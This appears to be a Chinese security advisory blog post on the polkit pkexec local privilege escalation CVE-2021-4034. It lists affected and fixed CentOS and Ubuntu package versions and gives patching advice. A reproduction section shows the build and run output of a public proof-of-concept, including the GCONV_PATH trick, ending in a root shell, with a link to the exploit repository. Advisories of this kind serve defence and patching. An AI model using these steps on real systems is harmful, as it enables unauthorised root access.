
漏洞描述Polkit是用于在Linux操作系统中控制系统范围特权的组件 。 它为非特权进程提供了与特权进程进行通信的有组织的方式 。 类似“sudo”的用法 。
CVE-2021-4034
polkit的pkexec存在本地权限提升漏洞 , 已获得普通权限的攻击者可通过此漏洞获取root权限 。
该漏洞CVSS评分:7.8 ,
危害等级:高危漏洞利用难度低 , 最早引入问题的commit来自2009年 , 影响版本范围远超去年的sudo漏洞 。 漏洞作者在Ubuntu、Debian、Fedora和CentOS的默认安装环境上均测试通过 。
影响范围影响版本:由于polkit为系统预装工具 , 目前主流Linux版本均受影响 。
修复版本:
CentOS系列:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu系列:
Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESM:policykit-1 - 0.10514.1ubuntu0.5+esm1
Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
漏洞复现下载poc , 进入poc目录 , 编译 , 运行 。
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo \"module UTF-8// PWNKIT// pwnkit 1\" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
poc地址https://github.com/berdav/CVE-2021-4034
修复建议参考漏洞影响范围 , 及时升级至最新安全版本 。
总结和参考1、及时安装安全软件 , 关闭不需要的服务和端口 。
2、开启系统防火墙 。
【革命|Linux Polkit本地权限提升漏洞(CVE-2021-4034)】3、及时升级系统或者软件的版本 。
- Linux|无利可图?又一家电子大厂解散团队退出苹果供应链,库克行动了!
- Linux|没想到闲鱼pro版本功能那么强大,你升级成功了吗
- Linux|一步到位 低到6799!酷睿i9笔记本推荐:超级多面手
- Linux|为发烧而生,红米K30S至尊纪念版,带来更流畅的使用体验
- Linux|Apple 提出了取代密码的「通行密匙」方案
- Linux 超 macOS、最讨厌 Angular.js 框架,调查了 7 万名开发者的最新发现!
- Linus Torvalds:最庆幸的是 30 年后,Linux 不是一个“死”项目
- Linux|每天了解一个居家小妙招——家里网速慢?网速提升好几倍的妙招
- Java|12代酷睿、14寸高色域屏、3999元:机械革命无界14这价格没短板
- Linux|掀起涨停潮!国产机器人概念大爆发,三大突围方向需要看清
